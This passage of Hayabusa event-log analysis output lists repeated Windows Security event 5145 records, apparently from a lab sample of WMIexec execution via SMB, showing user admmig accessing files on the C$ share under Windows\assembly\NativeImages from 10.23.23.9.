Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 | IP Addr: 10.23.23.9 | LID: 